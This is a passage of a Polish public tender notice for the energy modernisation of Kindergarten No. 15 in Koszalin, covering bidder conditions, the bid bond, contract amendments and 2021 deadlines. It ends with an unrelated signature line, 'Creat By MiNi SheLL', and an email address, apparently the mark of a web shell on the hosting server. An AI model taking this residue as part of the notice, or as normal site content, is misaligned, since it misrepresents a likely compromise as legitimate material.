podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy PZP; Zamawiający nie<br/>przewiduje wykluczenia na podstawie art. 109 ust. 1 ustawy PZP;<br/>2) spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>2.1) wykonał nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj. wykonał co najmniej 1 docieplenie budynku o wartości tych robót minimum 500.000,00 zł brutto;<br/>2.2) dysponuje niżej wymienionymi osobami, które będą pełniły funkcje:<br/>2.2.1) kierownika budowy (branża konstrukcyjno-budowlana) – 1 osoba posiadająca co najmniej<br/>uprawnienia budowlane w specjalności konstrukcyjno-budowlanej oraz co najmniej 5-letnie<br/>doświadczenie zawodowe pełniąc funkcję kierownika budowy;<br/>2.2.2) kierownika robót elektrycznych – 1 osoba posiadająca co najmniej uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>2.2.3) kierownika robót sanitarnych – 1 osoba posiadająca co najmniej uprawnienia budowlane<br/>w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych.<br/>Uwaga!<br/>1. W przypadku Wykonawców zagranicznych, w stosunku do osób, od których wymagane są<br/>uprawnienia budowlane zgodnie z ustawą Prawo budowlane, Zamawiający dopuszcza kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane (Dz. U. z 2020 r., poz. 1333 z późn. zm.).<br/>2. Zamawiający wymaga, aby osoby wymienione w ppkt 2.2 posiadały biegłą, tj. umożliwiającą<br/>bezproblemowe porozumiewanie się w mowie i w piśmie, znajomość języka polskiego. W przypadku gdy personel Wykonawcy nie posiada biegłej znajomości języka polskiego, Wykonawca zobowiązany będzie, na własny koszt, zapewnić tłumacza dla potrzeb i na okres realizacji umowy.<br/>3. W przypadku, gdy złożone przez Wykonawców podmiotowe środki dowodowe na potwierdzenie spełniania warunków udziału w postępowaniu będą zawierały kwoty wyrażone w walutach innych niż PLN, do oceny spełniania każdego warunku zawierającego daną kwotę lub wartość, wielkości te Wykonawca przeliczy po średnim kursie waluty obcej ogłoszonym przez NBP w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane – złożony na formularzu zgodnym ze wzorem zawartym w Rozdziale III SWZ pkt 4, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie;<br/>dowodami, o których mowa powyżej, są: referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnymi do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – złożonego na formularzu zgodnym ze wzorem zawartym w Rozdziale III SWZ pkt 5.<br/>Uwaga!<br/>a) Okresy wyrażone w latach lub miesiącach, o których mowa w ppkt 1 liczy się wstecz od dnia, w<br/>którym upływa termin składania ofert.<br/>b) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi Wykonawcami, Wykaz, o którym mowa w ppkt 1, dotyczy robót budowlanych, w<br/>których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>c) Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>d) Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile Wykonawca wskazał w Oświadczeniu, o którym mowa w Rozdziale I pkt 6<br/>SWZ, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania, Zamawiający żąda od Wykonawcy złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu pierwszym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów.<br/>2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do reprezentowania nie wynika<br/>z dokumentów, o których mowa w ppkt 1 Zamawiający żąda od Wykonawcy Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>3. Pełnomocnictwo do reprezentowania Wykonawcy określające jego zakres winno być złożone wraz z ofertą. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoby uprawnionej do reprezentowania Wykonawcy. W przypadku gdy Pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu poprzednim dokonuje mocodawca lub może dokonać również notariusz.<br/>4. Zapisy ppkt 2 stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego.<br/>5. Zapisy ppkt 1 i 2 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach opisanych w Rozdziale I pkt 5.1 SWZ.<br/>6. W przypadku, o którym mowa w Rozdziale I pkt 5.1 ppkt 1 SWZ:<br/>6.1) Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa<br/>wraz z ofertą ZOBOWIĄZANIE podmiotu udostępniającego zasoby do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>6.2) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby,<br/>składa wraz z Oświadczeniem, o którym mowa w Rozdziale I pkt 6 SWZ, OŚWIADCZENIE podmiotu udostępniającego zasoby, o którym mowa w art. 125 ust. 5 ustawy PZP, według wzoru określonego w Rozdziale III SWZ pkt 2, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest obowiązany wnieść wadium w wysokości:<br/>20.000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100)<br/>2) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, których mowa w art. 98 ust. 1 pkt 2 i<br/>3 oraz ust. 2 ustawy PZP.<br/>3) Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>3.1) pieniądzu;<br/>3.2) gwarancjach bankowych;<br/>3.3) gwarancjach ubezpieczeniowych;<br/>3.4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r., poz. 299).<br/>4) Wadium wnoszone w pieniądzu wpłaca się przelewem na poniższy rachunek bankowy: Urząd<br/>Miejski w Koszalinie Nr rachunku: 78 1140 2118 0000 2444 4400 1304 z dopiskiem:<br/>Modernizacja energetyczna budynku Przedszkola nr 15 przy ul. Stanisława Staszica 11 w Koszalinie<br/>w ramach zadania inwestycyjnego „Modernizacja energetyczna obiektów użyteczności publicznej Żłobek Skrzat, Przedszkole nr 13, 14, 15, ZS nr 7 w Koszalinie” – WADIUM<br/>Informacja dla Wykonawcy Zagranicznego<br/>IBAN: PL78114021180000244444001304<br/>BIC/SWIFT: BREX PL PW<br/>5) Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku<br/>Zamawiającego, przy czym musi to nastąpić przed upływem terminu składania ofert.<br/>6) Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w ppkt 3.2 – 3.4<br/>Wykonawca przekazuje Zamawiającemu w oryginale w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w ppkt 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane.<br/>4) W przypadku, o którym mowa w ppkt 3, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty Oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy, według wzoru określonego w Rozdziale III pkt 3 SWZ.<br/>5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują:<br/>5.1) każdy samodzielnie brak podstaw wykluczenia, o których mowa w Rozdziale I pkt 5 ppkt 1 SWZ;<br/>5.2) co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w całości spełnianie warunku określonego w Rozdziale I pkt 5 ppkt 2.1 SWZ;<br/>5.3) łącznie spełnianie warunku określonego w Rozdziale I pkt 5 ppkt 2.2 SWZ.<br/>6) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców OŚWIADCZENIE,<br/>o którym mowa w Rozdziale I pkt 6 SWZ składa każdy z Wykonawców. Oświadczenia te winny<br/>potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.ZAM dop możl dok zm post zaw um dot Podwyk, o któr mowa w art. 118 ust. 1 ust PZP. Jeżeli nast zm albo rezyg z Podwyk, na któr zas WYK powoł się, na zas określ w art. 118 ust. 1 ust PZP, w celu wykaz speł war udz w postęp, o któr mowa w art. 57 pkt 2 ust PZP, WYK jest obow wykaz ZAM, iż propon inny Podwyk lub WYK sam speł je w stop nie mniej niż wym w trak postęp o udziel zamów.<br/>2.ZAM dop możl dok zmian postan zawart umowy dot osób, któr dysp WYK na zas in niż określ<br/>w ust. 1. W tak przyp WYK zobow jest wskaz os do realiz zamów posiad kwalif nie niższe niż wym w trakcie postęp o udziel zamów.<br/>3.ZAM może wyr zgod na wykon w trakcie real przedm umow robót zam w stos do przewidz dok<br/>proj w syt, gdy wykon tych rob będzie niezb do prawidł, tj. zgod z zasad wiedzy tech i obowiąz<br/>na dzień odb robót przep, wykon przedm umowy określ w § 1 Um.<br/>4.ZAM może dok rezygn lub na wn WYK wyr zgodę na rezygn z wykonyw części (elem) przedm umow przewidz w dok projek w syt, gdy ich wykon będzie zbędne do prawidł, tj. zgodn z zasad wiedzy tech i obowiąz na dzień odb robót przep, wykon przedm umow określ w § 1 Umow. Wart części przedm umow obj rezygn nie może wyn więcej niż 10% wart umow i obniża wys wynagrodz.<br/>5.ZAM dop możl dokon zmian postan zaw umow w stos do treści oferty w zakresie ter wykon<br/>zamów w przypadku:<br/>1)dział siły wyższ, za któr uważa się zdarz w charakt nadzwyczaj, występ po zawar umow, a któr Str nie były w stanie przewidz w mom jej zawar i któr zaistn lub skut uniemożl wykon przedm umowy w terminie;<br/>2)braku możl prowadz robót na skutek obiekt warun klimat, w tym wystąp niekorzyst warun atmosf, uniemożliw lub bardzo utrudn prowadz robót (np. intens opady śniegu, deszczu, temper poniżej -5 st C);<br/>3)wstrzym robót przez ZAM lub przerw w wykon robót powst na skutek okol, za któr pon odpowiedz ZAM lub os trzec;<br/>4)wstrzym robót przez właś organ z przyc niezawin przez WYK; 5)nasil zjawisk związ z pand COVID-19 lub pojaw się now zdarz o charakt pand lub epid;<br/>6)zwiększ przez ZAM zakresu rzecz prac objętych zamów;<br/>7)w przyp wystąp robót dodatk jak również wykon koniec rozw zamien w stos do projekt;<br/>8)w przyp wystąp przeszkód w gruncie (w tym niezinwentaryzowane sieci, przeszkody geol).<br/>6.Podst dokon zmian, o któr mowa w ust. 3, 4, 5 będzie prot koniecz określ wystąp okol uzasad<br/>wprowadz zmian.<br/>7.W przyp wniosku WYK o dokon zmiany, o któr mowa w ust. 1 i 2 WYK obow jest przedst dok<br/>potwier kwalif wsk osób pozwal na stwier spełn przez wsk osoby wym SWZ.<br/>8.W przyp zmian, w trakcie realiz. umowy:<br/>1)staw. podatku od tow i usług oraz podat akcyz;<br/>2)wys minim wynagr za pracę albo wys minim staw godzin, ustal na podst przep ustawy z<br/>10.10.2002 r. o minim wynagr za pracę;<br/>3)zasad podl ubezp społ lub ubezp zdrow lub wys stawki składki na ubezp społ lub zdrow;<br/>4)zasad grom i wys wpłat do pracow planów kapit, o których mowa w ustawie z 04.10.2018 r. o<br/>pracow planach kapit, jeżeli zm te będą miały wpływ na koszty wyk zam przez WYK, wynagr<br/>brutto, o któr mowa w § 8 ust. 1 umowy, ulegnie odpow zm, nie wcześ jednak niż od dnia złoż<br/>wniosku przez WYK.<br/>9.Każd przed wprowadz zm wynagr brutto, o któr mowa w ust. 8, WYK jest obow złoż wniosek i<br/>przedst ZAM na piśmie, wpływ zmian staw podat od towar i usług oraz podat akcyz, zmiany wys<br/>minim wynagr za pracę albo wys minim stawki godz ustal na podst przep ustawy z 10.10.2002 r.<br/>o minim wynagr za pracę, zm zasad podl ubezp społ lub ubezp zdrow lub wys staw skł na ubezp<br/>społ lub zdrow oraz zm zasad grom i wys wpłat do prac planów kapit, o któr mowa w ustawie z<br/>04.10.2018 r. o pracow plan kapit, na kosz wykon zam oraz prop nowej wys wynagr, potw powoł<br/>się na stos przep, z któr wynik ww. zm. WYK zobow jest doł do wnios dok, z któr będzie wynik w<br/>jakim zak zm te mają wpł na koszt wykon umowy. Wn wraz z uzasad musi być złoż w siedz ZAM<br/>w term 30 dni od dnia wej w życie przep powod zm, wni złoż po tym term nie będzie rozpatr. Zm<br/>wynagr brutto następ po zawar przez str aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w przedmiotowym postępowaniu Wykonawca składa za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Wykonawca, któremu zostanie udzielone zamówienie, przedłoży Zamawiającemu przed<br/>zawarciem umowy:<br/>1) wypełnioną tabelę elementów scalonych – załącznik Nr 2 do Rozdziału I SWZ<br/>2) szczegółowe kosztorysy ofertowe sporządzone na podstawie własnych przedmiarów robót, na które zakres określony został w dokumentacji projektowej; kosztorysy te powinny zawierać przyjęte do wyliczeń stawki robocizny, wysokość przyjętych procentowo narzutów kosztów<br/>pośrednich, zysku i kosztów zakupu, przyjęte podstawy wyceny robót, ilości wyliczonych<br/>przez siebie robót, ceny jednostkowe wszystkich materiałów oraz ceny jednostkowe najmu sprzętu, wartości poszczególnych pozycji kosztorysowych oraz tabelę elementów scalonych wraz z ich wartościami; sumaryczna wartość końcowa wszystkich kosztorysów szczegółowych musi być zgodna z oferowaną ceną za wykonanie całego przedmiotu zamówienia;<br/>3) uprawnienia oraz aktualne zaświadczenia potwierdzające wpis na listę członków właściwej<br/>izby samorządu zawodowego kierownika budowy oraz kierowników robót poszczególnych<br/>branż;<br/>4) polisę lub inny dokument potwierdzający zawarcie umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość nie mniejszą niż 200.000,00 zł; jeżeli termin objęcia ochroną ubezpieczeniową upływa w trakcie realizacji<br/>zamówienia Wykonawca jest zobowiązany przedłużyć termin ubezpieczenia i przedstawić<br/>Zamawiającemu polisę lub inny dokument potwierdzający zawarcie umowy ubezpieczenia od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności;<br/>5) w przypadku wyboru oferty złożonej przez „konsorcjum Wykonawców” – umowę regulującą<br/>współpracę członków konsorcjum;<br/>6) informację dotyczącą organu podatkowego właściwego dla Wykonawcy (np. Naczelnik<br/>Pierwszego Urzędu Skarbowego w Koszalinie);<br/>7) dowód wniesienia zabezpieczenia należytego wykonania umowy.<br/>II. Nazwa zamówienia albo umowy ramowej: Modernizacja energetyczna budynku Przedszkola<br/>nr 15 przy ul. Stanisława Staszica 11 w Koszalinie w ramach zadania inwestycyjnego „Modernizacja energetyczna obiektów użyteczności publicznej Żłobek Skrzat, Przedszkole nr 13, 14, 15, ZS nr 7 w Koszalinie”<br/>III. Nazwa projektu lub programu: Umowa o dofinansowanie projektu pn. "Modernizacja<br/>energetyczna budynków użyteczności publicznej: Żłobek "Skrzat", Przedszkole nr 13, 14, 15, ZS<br/>nr 7 w Koszalinie" nr umowy o dofinansowanie RPZP.02.05.00-32-A063/16-00 z dnia<br/>06.11.2018 r. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2014-2020.<br/>IV. Wymagany termin realizacji zamówienia: 12 miesięcy od dnia zawarcia umowy.<br/>V. Z uwagi na ograniczoną liczbę znaków w Sekcji VII pkt. 7.4. - Rodzaj i zakres zmian umowy<br/>oraz warunki ich wprowadzenia, opisano z zastosowaniem skrótów. Pełna treść dostępna jest w<br/>SWZ w Rozdziale V Projekt umowy - paragraf 11.

Creat By MiNi SheLL
Email: jattceo@gmail.com